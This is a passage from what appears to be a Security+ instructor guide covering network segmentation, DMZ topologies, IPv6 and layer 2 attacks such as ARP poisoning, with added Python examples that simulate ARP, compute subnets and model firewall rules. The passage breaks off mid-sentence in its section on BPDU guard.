• Access: the client device must access the network, obtaining a physical channel
and logical address. The user must be authenticated and authorized to use the
email application. The corollary is that unauthorized users and devices must be
denied access.

• Email mailbox server: ensure that the mailbox is only accessed by authorized
clients and that it is fully available and fault tolerant. Ensure that the email service
runs with a minimum number of dependencies and that the service is designed to
be resilient to faults.

• Mail transfer server: this must connect with untrusted Internet hosts, so
communications between the untrusted network and trusted LAN must be carefully
controlled. Any data or software leaving or entering the network must be subject to
policy-based controls.

You can see that this type of business flow will involve systems in different places in
the network. Placing the client, the mailbox, and the mail transfer server all within the
same logical network "segment" will introduce many vulnerabilities. Understanding and
controlling how data flows between these locations is a key part of secure and effective
network design.

Teaching Tip: Stress the point that the network is there to meet business goals. The
network should be designed around business logic.

Network Appliances
Show Slide(s): Network Appliances

A number of network appliances are involved in provisioning a network architecture:

• Switches: forward frames between nodes in a cabled network. Switches work at
layer 2 of the OSI model and make forwarding decisions based on the hardware
or Media Access Control (MAC) address of attached nodes. Switches can establish
network segments that either map directly to the underlying cabling or to logical
segments, created in the switch configuration as virtual LANs (VLANs).

When designing and troubleshooting a network, it is helpful to compartmentalize functions
to discrete layers. The Open Systems Interconnection (OSI) model is a widely quoted
example of how to define layers of network functions.

• Wireless access points: provide a bridge between a cabled network and wireless
clients, or stations. Access points work at layer 2 of the OSI model.

• Routers: forward packets around an internetwork, making forwarding decisions
based on IP addresses. Routers work at layer 3 of the OSI model. Routers can apply
logical IP subnet addresses to segments within a network.

• Firewalls: apply an access control list (ACL) to filter traffic passing in or out of a
network segment. Firewalls can work at layer 3 of the OSI model or higher.

• Load balancers: distribute traffic between network segments or servers to optimize
performance. Load balancers can work at layer 4 of the OSI model or higher.

• Domain Name System (DNS) servers: host name records and perform name
resolution to allow applications and users to address hosts and services using fully
qualified domain names (FQDNs) rather than IP addresses. DNS works at layer 7
of the OSI model. Name resolution is a critical service in network design. Abuse of
name resolution is a common attack vector.

Teaching Tip: This section is intended as a brief primer for students who have not
completed Network+. You will not need to spend time on it otherwise. The OSI model
does get mentioned in the Security+ syllabus, though later on, in the context of
deploying firewalls to the cloud, so students will need to know the layer IDs. We have
omitted layers 5 and 6 from the diagram, however. You might want to point out the
much simpler four-layer TCP/IP model.


Appliances, protocols, and addressing functions within the OSI network layer reference model.
(Images © 123RF.com.)

Routing and Switching Protocols
Show Slide(s): Routing and Switching Protocols

The basic function of a network is to forward traffic from one node to another. A
number of routing and switching protocols are used to implement forwarding. The
forwarding function takes place at two different layers:

• Layer 2 forwarding occurs between nodes on the same local network segment that
are all in the same broadcast domain. At layer 2, a broadcast domain is either all the
nodes connected to the same physical unmanaged switch, or all the nodes within a
virtual LAN (VLAN) configured on one or more managed switches. At layer 2, each
node is identified by the network interface's hardware or Media Access Control
(MAC) address. A MAC address is a 48-bit value written in hexadecimal notation,
such as 00-15-5D-01-CA-4A.

• Layer 3 forwarding, or routing, occurs between both logically and physically defined
networks. A single network divided into multiple logical broadcast domains is said to
be subnetted. Multiple networks joined by routers form an internetwork. At layer 3,
nodes are identified by an Internet Protocol (IP) address.

Teaching Tip: This section is intended as a brief primer for students who have not
completed Network+. You will not need to spend time on it otherwise.

Address Resolution Protocol (ARP)

The Address Resolution Protocol (ARP) maps a network interface's hardware (MAC)
address to an IP address. Normally a device that needs to send a packet to an IP
address but does not know the receiving device's MAC address broadcasts an ARP
Request packet, and the device with the matching IP responds with an ARP Reply.


ARP in action: An ARP broadcast is used when there is no MAC:IP mapping in the cache and is
received by all hosts on the same network, but only the host with the requested
IP should reply. (Images © 123RF.com.)
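The request/reply exchange described above, written out as an added example (this code is not part of the original guide). It builds a raw Ethernet frame carrying an ARP Request, hands the same broadcast frame to every host on a constructed three-host segment, and shows that each host learns the sender's mapping but only the host owning the target IP answers. The host table, MAC addresses, and IP addresses are constructed sample data.

```python
import socket
import struct

# Constructed sample segment: every host is in the same broadcast domain.
HOSTS = {
    "192.168.1.10": "00:15:5d:01:ca:4a",   # requesting workstation
    "192.168.1.20": "00:15:5d:01:ca:4b",   # file server
    "192.168.1.1":  "00:15:5d:01:ca:01",   # default gateway
}
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header + 28-byte ARP body for IPv4 over Ethernet (RFC 826 layout)."""
    dst_mac = BROADCAST_MAC if opcode == ARP_REQUEST else target_mac
    eth = mac_bytes(dst_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode a frame; reject anything that is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol types")
    body = frame[22:42]
    return {
        "dst_mac": mac_str(frame[0:6]),
        "opcode": opcode,
        "sender_mac": mac_str(body[0:6]),
        "sender_ip": socket.inet_ntoa(body[6:10]),
        "target_mac": mac_str(body[10:16]),
        "target_ip": socket.inet_ntoa(body[16:20]),
    }


def host_receive(my_ip, my_mac, frame, cache):
    """What one NIC does with the broadcast: learn the sender, reply only if the target IP is mine."""
    pkt = parse_arp(frame)
    if pkt["opcode"] != ARP_REQUEST:
        return None
    cache[pkt["sender_ip"]] = pkt["sender_mac"]   # every listener may cache the sender's mapping
    if pkt["target_ip"] != my_ip:
        return None
    return build_arp(ARP_REPLY, my_mac, my_ip, pkt["sender_mac"], pkt["sender_ip"])


def resolve(requester_ip, target_ip):
    """Simulate the exchange: broadcast one request, collect every reply heard on the segment."""
    request = build_arp(ARP_REQUEST, HOSTS[requester_ip], requester_ip, ZERO_MAC, target_ip)
    replies = []
    for ip, mac in HOSTS.items():
        if ip == requester_ip:
            continue
        reply = host_receive(ip, mac, request, cache={})
        if reply is not None:
            replies.append(parse_arp(reply))
    return replies


if __name__ == "__main__":
    for reply in resolve("192.168.1.10", "192.168.1.20"):
        print(f"{reply['sender_ip']} is at {reply['sender_mac']} (unicast to {reply['dst_mac']})")
```

Note that the reply is unicast back to the requester's MAC, while the request had to be broadcast; asking for an IP that no host on the segment owns produces no reply at all, which is exactly the cache-miss case the figure illustrates.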

Internet Protocol (IP)

IP provides the addressing mechanism for logical networks and subnets. A 32-bit IPv4
address is written in dotted decimal notation, with either a network prefix or subnet
mask to divide the address into network ID and host ID portions. For example, in the
IP address 172.16.1.101/16, the /16 prefix indicates that the first half of the address
(172.16.0.0) is the network ID, while the remainder uniquely identifies a host on that
network. This prefix can also be written as a subnet mask in the form 255.255.0.0.
Networks also use 128-bit IPv6 addressing. IPv6 addresses are written using hex
notation in the general format 2001:db8::abc:def0:1234. In IPv6, the last 64 bits
are fixed as the host's interface ID. The first 64 bits contain network information in
a set hierarchy. For example, an ISP's routers can use the first 48 bits to determine
where the network is hosted on the global Internet. Within that network, the site
administrator can use the 16 bits remaining out of 64 to divide the local network into
subnets.

Routing Protocols

Information about how to reach individual networks within an internetwork is
processed by routers, which store the data in a routing table. A route to a network can
be configured statically, but most networks use routing protocols to transmit new
and updated routes between routers. Some common routing protocols include Border
Gateway Protocol (BGP), Open Shortest Path First (OSPF), Enhanced Interior
Gateway Routing Protocol (EIGRP), and Routing Information Protocol (RIP).

Network Segmentation
Show Slide(s): Network Segmentation

A network segment is one where all the hosts attached to the segment can use local
(layer 2) forwarding to communicate freely with one another. The hosts are said to be
within the same broadcast domain. Segregation means that the hosts in one segment
are restricted in the way they communicate with hosts in other segments. They might
only be able to communicate over certain network ports, for instance.

"Freely" means that no network appliances or policies are preventing communications. Each
host may be configured with access rules or host firewalls or other security tools to prevent
access, but the "view from the network" is that hosts in the same segment are all free to
attempt to communicate.

Assuming an Ethernet network, network segments can be established physically by
connecting all the hosts in one segment to one switch and all the hosts in another
segment to another switch. The two switches can be connected by a router and
the router can enforce network policies or access control lists (ACL) to restrict
communications between the two segments.
Because enterprise networks typically feature hundreds of switching appliances and
network ports (not to mention wireless access and remote access), segmentation is
more likely to be enforced using virtual LANs (VLANs). Any given switch port can be
assigned to any VLAN in the same topology, regardless of the physical location of
the switch. The segmentation enforced by VLANs at layer 2 can be mapped to logical
divisions enforced by IP subnets at layer 3.

Teaching Tip: Note that segment can take on different meanings depending on the
network layer context. This definition ignores the lower level concept of collision
domains. The basic point is to create blocks where hosts within the segment are free
to communicate with one another, but communication between segments is subject
to access policies.
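An added example (not from the original guide) serving both the IP addressing section and the segmentation section above. It does the prefix and mask arithmetic by hand rather than looking it up, splits an IPv6 address into the 48-bit routing prefix, 16-bit subnet ID and 64-bit interface ID described earlier, and then uses a constructed VLAN-to-subnet plan to decide whether a flow stays inside one broadcast domain (layer 2, no policy enforcement point) or crosses a segment boundary (layer 3, where a router ACL can be applied). The VLAN numbers and subnets are assumptions for illustration.

```python
import ipaddress

ALL_ONES_32 = 0xFFFFFFFF


def prefix_to_mask(prefix):
    """/16 -> 255.255.0.0: a mask is just the top `prefix` bits set in a 32-bit word."""
    if not 0 <= prefix <= 32:
        raise ValueError("IPv4 prefix must be 0..32")
    mask = (ALL_ONES_32 << (32 - prefix)) & ALL_ONES_32
    return str(ipaddress.IPv4Address(mask))


def split_ipv4(cidr):
    """'172.16.1.101/16' -> (network ID, host ID as an integer, subnet mask)."""
    addr, prefix = cidr.split("/")
    prefix = int(prefix)
    value = int(ipaddress.IPv4Address(addr))
    mask = int(ipaddress.IPv4Address(prefix_to_mask(prefix)))
    network_id = str(ipaddress.IPv4Address(value & mask))
    host_id = value & (~mask & ALL_ONES_32)
    return network_id, host_id, prefix_to_mask(prefix)


def split_ipv6(addr):
    """Return the /48 global routing prefix, the 16-bit subnet ID and the 64-bit interface ID."""
    value = int(ipaddress.IPv6Address(addr))
    routing = value >> 80                       # first 48 bits: where the site sits on the Internet
    subnet_id = (value >> 64) & 0xFFFF          # next 16 bits: site administrator's subnets
    interface_id = value & ((1 << 64) - 1)      # last 64 bits: fixed as the host's interface ID
    routing_prefix = ipaddress.IPv6Network(f"{ipaddress.IPv6Address(routing << 80)}/48")
    return str(routing_prefix), subnet_id, interface_id


# Constructed VLAN plan: each VLAN is one layer 2 broadcast domain mapped to one IPv4 subnet.
VLANS = {
    10: ipaddress.ip_network("10.1.10.0/24"),   # employee workstations
    20: ipaddress.ip_network("10.1.20.0/24"),   # servers
    30: ipaddress.ip_network("10.1.30.0/24"),   # VoIP handsets
}


def vlan_of(ip):
    ip = ipaddress.ip_address(ip)
    for vlan_id, subnet in VLANS.items():
        if ip in subnet:
            return vlan_id
    return None


def classify_flow(src_ip, dst_ip):
    """'local'   = same broadcast domain, switched at layer 2 with no enforcement point;
       'routed'  = crosses a segment boundary, so a router/firewall ACL applies;
       'unknown' = an address outside the documented plan (worth investigating as
                   undocumented change)."""
    src_vlan, dst_vlan = vlan_of(src_ip), vlan_of(dst_ip)
    if src_vlan is None or dst_vlan is None:
        return "unknown"
    return "local" if src_vlan == dst_vlan else "routed"


if __name__ == "__main__":
    print(split_ipv4("172.16.1.101/16"))
    print(split_ipv6("2001:db8:1:2::1"))
    print(classify_flow("10.1.10.5", "10.1.20.9"))
```

The "unknown" result is the useful one in practice: a host that appears in traffic but belongs to no VLAN in the plan is the lack-of-documentation weakness from the start of this topic showing up on the wire.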

Network Topology and Zones
Show Slide(s): Network Topology and Zones

Given the ability to create segregated segments with the network, you can begin to
define a topology of different network zones. A topology is a description of how a
computer network is physically or logically organized. The logical and physical network
topology should be analyzed to identify points of vulnerability and to ensure that the
goals of confidentiality, integrity, and availability are met by the design.
The main building block of a security topology is the zone. A zone is an area of the
network where the security configuration is the same for all hosts within it. Zones
should be segregated from one another by physical and/or logical segmentation, using
VLANs and subnets. Traffic between zones should be strictly controlled using a security
device, typically a firewall.
Dividing a campus network or data center into zones implies that each zone has a
different security configuration. The main zones are as follows:

• Intranet (private network): this is a network of trusted hosts owned and
controlled by the organization. Within the intranet, there may be sub-zones for
different host groups, such as servers, employee workstations, VoIP handsets, and
management workstations.

Hosts are trusted in the sense that they are under your administrative control and subject to
the security mechanisms (anti-virus software, user rights, software updating, and so on) that
you have set up to defend the network.

• Extranet: this is a network of semi-trusted hosts, typically representing business
partners, suppliers, or customers. Hosts must authenticate to join the extranet.

• Internet/guest: this is a zone permitting anonymous access (or perhaps a mix of
anonymous and authenticated access) by untrusted hosts over the Internet.

A large network may need more zones to represent different host groups, such as
separating wireless stations from desktop workstations, and putting servers in their
own groups. Cisco's enterprise security architecture uses core and distribution layers
to interconnect access blocks, with each access block representing a different zone and
business function.

Teaching Tip: Note that zone is a wholly logical concept. A zone is a combination of a
VLAN, subnet, and access control list.


Enterprise security architecture. (Images © 123RF.com.)

Demilitarized Zones
Show Slide(s): Demilitarized Zones

The most important distinction between different security zones is whether a host
is Internet-facing. An Internet-facing host accepts inbound connections from and
makes connections to hosts on the Internet. Internet-facing hosts are placed in one
or more demilitarized zones (DMZs). A DMZ is also referred to as a perimeter or
edge network. The basic principle of a DMZ is that traffic cannot pass directly through
it. A DMZ enables external clients to access data on private systems, such as web
servers, without compromising the security of the internal network as a whole. If
communication is required between hosts on either side of a DMZ, a host within the
DMZ acts as a proxy. For example, if an intranet host requests a connection with a
web server on the Internet, a proxy in the DMZ takes the request and checks it. If the
request is valid, it retransmits it to the destination. External hosts have no idea about
what (if anything) is behind the DMZ.
Both extranet and Internet services are likely to be Internet-facing. The hosts that
provide the extranet or public access services should be placed in one or more
demilitarized zones. These would typically include web servers, mail and other
communications servers, proxy servers, and remote access servers. The hosts in a
DMZ are not fully trusted by the internal network because of the possibility that they
could be compromised from the Internet. They are referred to as bastion hosts and
run minimal services to reduce the attack surface as much as possible. A bastion host
would not be configured with any data that could be a security risk to the internal
network, such as user account credentials.
It is quite likely that more than one DMZ will be required as the services that run in
them may have different security requirements:

• A DMZ hosting proxies or secure web gateways to allow employees access to web
browsing and other Internet services.

• A DMZ hosting communication servers, such as email, VoIP, and conferencing.

• A DMZ for servers providing remote access to the local network via a Virtual Private
Network (VPN).

• A DMZ hosting traffic for authorized cloud applications.

• A multi-tier DMZ to isolate front-end, middleware, and backend servers.

Teaching Tip: Point out that when a DMZ is used for a remote access VPN, you are
allowing traffic through, but only where it is fully authenticated and subject to access
controls.

Demilitarized Zone Topologies
Show Slide(s): Demilitarized Zone Topologies

To configure a DMZ, two different security configurations must be enabled: one on
the external interface and one on the internal interface. A DMZ and intranet are on
different subnets, so communications between them need to be routed.

Screened Subnet
A screened subnet uses two firewalls placed on either side of the DMZ. The edge
firewall restricts traffic on the external/public interface and allows permitted traffic
to the hosts in the DMZ. The edge firewall can be referred to as the screening firewall
or router. The internal firewall filters communications between hosts in the DMZ and
hosts on the LAN. This firewall is often described as the choke firewall. A choke point
is a purposefully narrow gateway that facilitates better access control and easier
monitoring.

A screened subnet topology. (Images © 123RF.com.)

Triple-Homed Firewall
A DMZ can also be established using one router/firewall appliance with three network
interfaces, referred to as triple-homed. One interface is the public one, another is the
DMZ, and the third connects to the LAN. Routing and filtering rules determine what
forwarding is allowed between these interfaces. This can achieve the same sort of
configuration as a screened subnet.
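An added example (not from the original guide) modelling the screened subnet just described as policy rather than as a diagram: three zones, an edge (screening) firewall and a choke firewall, each with a short permit list and an implicit deny. A flow is permitted only if every firewall on its path permits it, which is what makes "traffic cannot pass directly through the DMZ" true in practice: the Internet cannot reach the LAN, and a LAN client reaches the Internet only as two separate flows via the DMZ proxy. The zone subnets, ports, and rules are assumptions chosen for illustration.

```python
import ipaddress
from collections import namedtuple

Rule = namedtuple("Rule", "src_zone dst_zone proto dport action")

# Constructed addressing plan. The Internet is the catch-all, so it is matched last.
ZONES = {
    "dmz": ipaddress.ip_network("192.0.2.0/24"),
    "lan": ipaddress.ip_network("10.0.0.0/8"),
    "internet": ipaddress.ip_network("0.0.0.0/0"),
}


def zone_of(ip):
    ip = ipaddress.ip_address(ip)
    for name in ("dmz", "lan", "internet"):
        if ip in ZONES[name]:
            return name


# Edge/screening firewall: between the public interface and the DMZ.
EDGE = [
    Rule("internet", "dmz", "tcp", 443, "permit"),    # public web server
    Rule("internet", "dmz", "tcp", 25, "permit"),     # mail transfer server
    Rule("dmz", "internet", "tcp", None, "permit"),   # proxy and mail relay going outbound
]
# Choke firewall: between the DMZ and the LAN.
CHOKE = [
    Rule("lan", "dmz", "tcp", 3128, "permit"),        # clients may talk to the web proxy only
    Rule("dmz", "lan", "tcp", 143, "permit"),         # mail relay delivers to the mailbox server
]
FIREWALLS = {"edge": EDGE, "choke": CHOKE}

# Which firewalls a flow crosses, in order. Internet<->LAN must traverse both.
# For a triple-homed appliance the same tables apply; only this routing changes.
PATH = {
    ("internet", "dmz"): ["edge"],  ("dmz", "internet"): ["edge"],
    ("dmz", "lan"): ["choke"],      ("lan", "dmz"): ["choke"],
    ("internet", "lan"): ["edge", "choke"],
    ("lan", "internet"): ["choke", "edge"],
}


def matches(rule, src_zone, dst_zone, proto, dport):
    return (rule.src_zone == src_zone and rule.dst_zone == dst_zone
            and rule.proto == proto and rule.dport in (None, dport))


def evaluate(src_ip, dst_ip, proto, dport):
    """Verdict for one flow: first match wins on each firewall, implicit deny if nothing matches,
    and every firewall on the path must permit."""
    src_zone, dst_zone = zone_of(src_ip), zone_of(dst_ip)
    if src_zone == dst_zone:
        return "permit (same zone, no firewall in path)"
    for fw_name in PATH[(src_zone, dst_zone)]:
        for rule in FIREWALLS[fw_name]:
            if matches(rule, src_zone, dst_zone, proto, dport):
                if rule.action == "deny":
                    return f"deny by {fw_name}"
                break
        else:
            return f"deny by {fw_name} (implicit)"
    return "permit"


def via_proxy(client_ip, proxy_ip, dst_ip, dport, proxy_port=3128):
    """The only route out for a LAN client: one flow to the DMZ proxy, a second from the proxy onward."""
    return (evaluate(client_ip, proxy_ip, "tcp", proxy_port),
            evaluate(proxy_ip, dst_ip, "tcp", dport))


if __name__ == "__main__":
    print("internet -> web server  :", evaluate("198.51.100.7", "192.0.2.10", "tcp", 443))
    print("internet -> LAN host    :", evaluate("198.51.100.7", "10.0.0.5", "tcp", 443))
    print("LAN host -> internet    :", evaluate("10.0.0.5", "198.51.100.7", "tcp", 443))
    print("LAN host via DMZ proxy  :", via_proxy("10.0.0.5", "192.0.2.20", "198.51.100.7", 443))
```

Note where the denials come from: an inbound attempt at the LAN is stopped at the screening firewall before it ever reaches the choke, while a direct outbound attempt from a LAN client is stopped at the choke. Both verdicts are produced by the implicit deny, not by an explicit block rule, which is why the permit lists on each firewall should stay as short as the business workflow allows.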


A triple-homed firewall topology. (Images © 123RF.com.)

Screened Hosts
Show Slide(s): Screened Hosts

Smaller networks may not have the budget or technical expertise to implement a
DMZ. In this case, Internet access can still be implemented using a dual-homed proxy/
gateway server acting as a screened host.

A screened host. (Images © 123RF.com.)

Sometimes the term DMZ (or DMZ host) is used by router vendors to mean
a host on the local network that accepts connections from the Internet. This might be
simpler to configure and solve some access problems, but it makes the whole network
very vulnerable to intrusion and DoS. An enterprise DMZ is established by a separate
network interface and subnet so that traffic between hosts in the DMZ and the LAN
must be routed (and subject to firewall rules). Most SOHO routers do not have the
necessary ports or routing functionality to create a true DMZ.

Teaching Tip: For example, see the Netgear technical note "How do I configure a
device to be in the DMZ on my NETGEAR router" (kb.netgear.com). Tell students they
should be aware of this mis-use of the term for the certification exam.


Implications of IPv6
Show Slide(s): Implications of IPv6

IPv6 has impacts for premises networks, for the way your company accesses cloud
services, and for the way clients access web servers and other public servers that
you publish.
IPv6 may be enabled by default on clients and servers, and even on network
appliances (routers and firewalls), so there must be a management and security
plan for it. If IPv6 is enabled but unmanaged, there is the potential for malicious
use as a backdoor or covert channel. IPv6 also exposes novel attack vectors, such
as spoofing and DoS attacks on neighbor discovery (tools.cisco.com/security/center/
resources/ipv6_first_hop).
Hosts should be allocated IPv6 addresses that map to the same zones as the IPv4
topology. Firewalls should be configured with ACLs that either achieve the same
security configuration as for IPv4 or block IPv6, if that is a better option. One issue
here is that IPv6 is not intended to perform any type of address translation. Rather
than obscure internal/external traffic flows with private-to-public address mapping,
IPv6 routing and filtering policies should be configured to mirror the equivalent
IPv4 architecture.

The Internet Society has published a white paper on security implications of IPv6
(internetsociety.org/wp-content/uploads/…/deploy360-ipv6-security-v1.0.pdf).
Infoblox's white paper on migrating services to IPv6 provides more useful context (infoblox.
com/wp-content/uploads/…/infoblox-whitepaper-seven-deadly-traps-of-ipv6-deployment 0.pdf).

Other Secure Network Design Considerations
Show Slide(s): Other Secure Network Design Considerations

Network design must also be considered for data centers and the cloud. A data
center is a facility dedicated to hosting servers, rather than a mix of server and client
workstation machines.

Teaching Tip: This content is included in this topic to simplify the syllabus mapping, but
you may want to delay covering it to the cloud lesson.

East-West Traffic
Traffic that goes to and from a data center is referred to as north-south. This traffic
represents clients outside the data center making requests and receiving responses.
In data centers that support cloud and other Internet services, most traffic is actually
between servers within the data center. This is referred to as east-west traffic.
Consider a client uploading a photograph as part of a social media post. The image
file might be checked by an analysis server for policy violations (indecent or copyright
images, for instance), a search indexing service would be updated with the image
metadata, the image would be replicated to servers that provision content delivery
networks (CDNs), the image would be copied to backup servers, and so on. A single
request to the cloud tends to cascade to multiple requests and transfers within
the cloud.
The preponderance of east-west traffic complicates security design. If each of these
cascading transactions were to pass through a firewall or other security appliance,
it would create a severe bottleneck. These requirements are driving the creation of
virtualized security appliances that can monitor traffic as it passes between servers
(blogs.cisco.com/security/trends-in-data-center-security-part-traffic-trends).

Zero Trust
Zero trust is based on the idea that perimeter security is unlikely to be completely
robust. On a modern network, there are just too many opportunities for traffic to
escape monitoring by perimeter devices and DMZs. Zero trust uses systems such as
continuous authentication and conditional access to mitigate privilege escalation and
account compromise by threat actors.
Another zero trust technique is to apply microsegmentation. Microsegmentation is a
security process that is capable of applying policies to a single node, as though it was
in a zone of its own. Like east-west traffic, this requires a new generation of virtualized
security appliances to implement (vmware.com/solutions/micro-segmentation.html).


Review Activity:
Secure Network Designs
Answer the following questions:

1. A recent security evaluation concluded that your company's network design
is too consolidated. Hosts with wildly different functions and purposes are
grouped together on the same logical area of the network. In the past, this
has enabled attackers to easily compromise large swaths of network hosts.
What technique(s) do you suggest will improve the security of the network's
design, and why?

In general, you should start implementing some form of network segmentation to
put hosts with the same security requirements within segregated zones. For example,
the workstations in each business department can be grouped in their own subnets
to prevent a compromise of one subnet from spreading to another. Likewise, with
VLANs, you can more easily manage the logical segmentation of the network without
disrupting the physical infrastructure (i.e., devices and cabling).

2. You are discussing a redesign of network architecture with a client, and
they want to know what the difference between an extranet and Internet
is. How can you explain it?

The Internet is an external zone where none of the hosts accessing your services can
be assumed trusted or authenticated. An extranet is a zone allowing controlled access
to semi-trusted hosts, implying some sort of authentication. The hosts are semi-trusted
because they are not under the administrative control of the organization (as they are
owned by suppliers, customers, business partners, contractors, and so on).

3. Why is subnetting useful in secure network design?

Subnet traffic is routed, allowing it to be filtered by devices such as a firewall. An
attacker must be able to gather more information about the configuration of the
network and overcome more barriers to launch successful attacks.

4. How can an enterprise DMZ be implemented?

By using two firewalls (external and internal) around a screened subnet, or by using a
triple-homed firewall (one with three network interfaces).

5. What type of network requires the design to account for east-west traffic?

This is typical of a data center or server farm, where a single external request causes
multiple cascading requests between servers within the data center. This is a problem
for a perimeter security model, as funneling this traffic up to a firewall and then back to
a server creates a performance bottleneck.


Topic 9B
Implement Secure
Switching and Routing

EXAM OBJECTIVES COVERED
1.4 Given a scenario, analyze potential indicators associated with network attacks
3.1 Given a scenario, implement secure protocols (Routing and switching only)
3.3 Given a scenario, implement secure network designs

Teaching Tip: As well as port security, NAC, and route security, this topic covers
man-in-the-middle and layer 2 network attacks.

Attacks aimed at low-level networking functions can be highly effective. To implement
a network design that demonstrates confidentiality, integrity, and availability, you must
configure switches and routers with appropriate settings. These devices can be used
to enforce network access control mechanisms and ensure fault-tolerant paths within
the network.
Man-in-the-Middle and Layer 2 Attacks
Show Slide(s): Man-in-the-Middle and Layer 2 Attacks

Attacks at the physical and data link layers, referred to in the OSI model as layer 1
and layer 2, are often focused on information gathering (network mapping and
eavesdropping on network traffic).

Teaching Tip: Emphasize the lack of authentication at layer 2, the basic operation of
ARP, and the ways it can be subverted to perform DoS or MitM snooping. Point out that
on an IPv6 network, the Neighbor Discovery Protocol (ND) serves the same function as
ARP and is also vulnerable to cache pollution. There is, however, a secure form of the
protocol (SEND). MitM is non-inclusive terminology. On-path is now the preferred term,
though we will continue to use both in the course.

Man-in-the-Middle/On-Path Attacks
Attackers can also take advantage of the lack of security in low-level data link protocols
to perform man-in-the-middle (MitM) attacks. A MitM or on-path attack is where
the threat actor gains a position between two hosts, and transparently captures,
monitors, and relays all communication between the hosts. An on-path attack could
also be used to covertly modify the traffic. For example, a MitM host could present a
workstation with a spoofed website form, to try to capture the user credential. Another
common on-path attack spoofs responses to DNS queries, redirecting users to spoofed
websites. On-path attacks can be defeated using mutual authentication, where both
hosts exchange secure credentials, but at layer 2 it is not always possible to put these
controls in place.

MAC Cloning
MAC cloning, or MAC address spoofing, changes the hardware address configured on
an adapter interface or asserts the use of an arbitrary MAC address. While a unique
MAC address is assigned to each network interface by the vendor at the factory, it is
simple to override it in software via OS commands, alterations to the network driver
configuration, or using packet crafting software. This can lead to a variety of issues
when investigating security incidents or when depending on MAC addresses as part of
a security control, as the presented address of the device may not be reliable.

ARP Poisoning and MAC Flooding Attacks
Show Slide(s): ARP Poisoning and MAC Flooding Attacks

A host uses the Address Resolution Protocol (ARP) to discover the host on the local
segment that owns an IP address.

ARP Poisoning Attacks
An ARP poisoning attack uses a packet crafter, such as Ettercap, to broadcast
unsolicited ARP reply packets. Because ARP has no security mechanism, the receiving
devices trust this communication and update their MAC:IP address cache table with the
spoofed address.

Packet capture opened in Wireshark showing ARP poisoning.
(Screenshot used with permission from wireshark.org.)

This screenshot shows packets captured during a typical ARP poisoning attack:

• In frames …, the attacking machine with MAC address ending …a directs
gratuitous ARP replies at other hosts (… and …), claiming to have the IP addresses
.2 and .102.

• In frame …, the .… host tries to send a packet to the .… host, but it is received
by the attacking host with the destination MAC …a.

• In frame …, the attacking host retransmits frame … to the actual .… host. Wireshark
colors the frame black and red to highlight the retransmission.

• In frames 11 and 12, you can see the reply from .…, received by the attacking host in
frame 11 and retransmitted to the legitimate host in frame 12.

The usual target will be the subnet's default gateway (the router that accesses other
networks). If the ARP poisoning attack is successful, all traffic destined for remote
networks will be sent to the attacker. The attacker can perform a man-in-the-middle
attack, either by monitoring the communications and then forwarding them to the
router to avoid detection, or modifying the packets before forwarding them. The
attacker could also perform a denial of service attack by not forwarding the packets.

MAC Flooding Attacks
Where ARP poisoning is directed at hosts, MAC flooding is used to attack a switch.
The intention of the attacker is to exhaust the memory used to store the switch's MAC
address table. The switch uses the MAC address table to determine which port to use to
forward unicast traffic to its correct destination. Overwhelming the table can cause the
switch to stop trying to apply MAC-based forwarding and flood unicast traffic out of all
ports, working as a hub. This makes sniffing network traffic easier for the threat actor.

Loop Prevention
Show Slide(s): Loop Prevention

An Ethernet switch's layer 2 forwarding function is similar to that of an older network
appliance called a bridge. In a network with multiple bridges, implemented these
days as switches, there may be more than one path for a frame to take to its intended
destination. As a layer 2 protocol, Ethernet has no concept of Time To Live. Therefore,
layer 2 broadcast traffic could continue to loop through a network with multiple
paths indefinitely. Layer 2 loops are prevented by the Spanning Tree Protocol (STP).
Spanning tree is a means for the bridges to organize themselves into a hierarchy and
prevent loops from forming.

Teaching Tip: Students should be familiar with the concept of STP from the Network+
course.

STP configuration.

This diagram shows the minimum configuration necessary to prevent loops in a
network with three bridges or switches. The root bridge has two designated ports
(DP) connected to Bridge A and Bridge B. Bridges A and B both have root ports
connected back to the interfaces on the root bridge. Bridges A and B also have a
connection directly to one another. On Bridge A, this interface is active and traffic for
Bridge B can be forwarded directly over it. On Bridge B, the interface is blocked to
prevent a loop and traffic for Bridge A must be forwarded via the root bridge.

Broadcast Storm Prevention
STP is principally designed to prevent broadcast storms. Switches forward broadcast,
multicast, and unknown unicast traffic out of all ports. If a bridged network contains
a loop, broadcast traffic will travel through the network, get amplified by the other
switches, and arrive back at the original switch, which will re-broadcast each incoming
broadcast frame, causing an exponential increase (the storm), which will rapidly
overwhelm the switches and crash the network.
A loop can be created accidentally or maliciously by plugging a patch cable from
one patch panel port to another or connecting two wall ports. Normally, STP should
detect and close the loop, resulting in a few seconds' disruption and then ongoing
poor performance. However, STP may be misconfigured or a threat actor may have
managed to disrupt it. A storm control setting on a switch is a backup mechanism to
rate-limit broadcast traffic above a certain threshold.


Bridge Protocol Data Unit (BPDU) Guard
A threat actor might try to attack STP using a rogue switch or software designed to
imitate a switch. When a switch does not know the correct port to use for a particular
destination MAC address (if the cache has just been flushed, for instance), it floods the
unknown unicast frame out to all ports. Topology changes in STP can cause a switch to
flush the cache more frequently and to start flooding unicast traffic more frequently,
which can have a serious impact on network performance and assists sniffing attacks.
The configuration of switch ports should prevent the use of STP over ports designated
for client devices (access ports). An access port is configured with the portfast
command to prevent STP changes from delaying client devices trying to connect to the
